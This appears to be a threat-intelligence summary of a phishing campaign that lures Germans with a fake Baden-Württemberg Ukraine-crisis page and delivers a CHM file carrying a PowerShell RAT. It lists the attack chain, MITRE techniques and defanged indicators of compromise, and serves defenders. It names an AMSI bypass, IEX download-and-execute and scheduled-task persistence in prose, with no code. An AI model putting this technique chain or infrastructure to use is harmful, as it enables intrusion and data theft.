Threat actors lure Germans with updates about the Ukraine crisis via a decoy Baden-Württemberg site, delivering a PowerShell-based RAT that can steal data and execute commands. The operation uses AMSI bypass, creates a persistent scheduled task, and exfiltrates data to a German C2 domain kleinm.de. hashtags: #PowerShellRAT #BadenWuerttemberg #kleinm.de #GazpromGermina #collaboration-bw.de #UkraineCrisis
Keypoints
- Threat actors used a domain tied to a German collaboration site to host a decoy lure mimicking the Baden-Württemberg official site.
- The lure promotes a document named 2022-Q2-Bedrohungslage-Ukraine, offered via a prominent download button, which leads to a CHM file containing a PowerShell-based RAT.
- Opening the CHM triggers a Base64-encoded command that, after de-obfuscation, downloads a script from the fake site and executes it with Invoke-Expression (IEX).
- The downloaded script creates a folder called SecuriyHealthService and drops MonitorHealth.cmd and Status.txt; MonitorHealth.cmd is made persistent via a scheduled task.
- Status.txt implements a PowerShell RAT with functions to download/upload files, load additional PS scripts, and execute commands, including an AMSI bypass to evade defenses.
- The C2 domain used for exfiltration is kleinm.de, and attribution remains uncertain, though a Russian actor is hypothesized with weak supporting evidence.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Executes a PowerShell script to download and execute a script. Quote: ‘Executes PowerShell script to download and execute a script’
- [T1105] Ingress Tool Transfer – The downloaded script is designed to fetch and run code from a remote server. Quote: ‘designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).’
- [T1053] Persistence – Scheduled Task/Job – Creates a daily scheduled task to run MonitorHealth.cmd. Quote: ‘Executes task scheduler to add MonitorHealth.cmd as a daily task’
- [T1222] Defense Evasion – File and Directory Permissions Modification – Uses attrib.exe to hide the SecuriyHealthService folder. Quote: ‘Uses attrib.exe to hide SecuriyHealthService folder’
- [T1562.001] Impair Defenses – Bypass AMSI – Bypasses the Windows Antimalware Scan Interface using an AES-encrypted function called bypass. Quote: ‘bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass.’
Indicators of Compromise
- [Phishing Site] collaboration-bw[.]de/bedrohung-ukr.html – a compromised/decoy site hosting the lure.
- [File name] 2022-Q2-Bedrohungslage-Ukraine.zip, 2022-Q2-Bedrohungslage-Ukraine.chm – lure delivery artifacts.
- [Hash] Status.txt – a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f
- [Hash] MonitorHealth.cmd – fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd
- [Domain] kleinm[.]de – C2 domain used for exfiltration.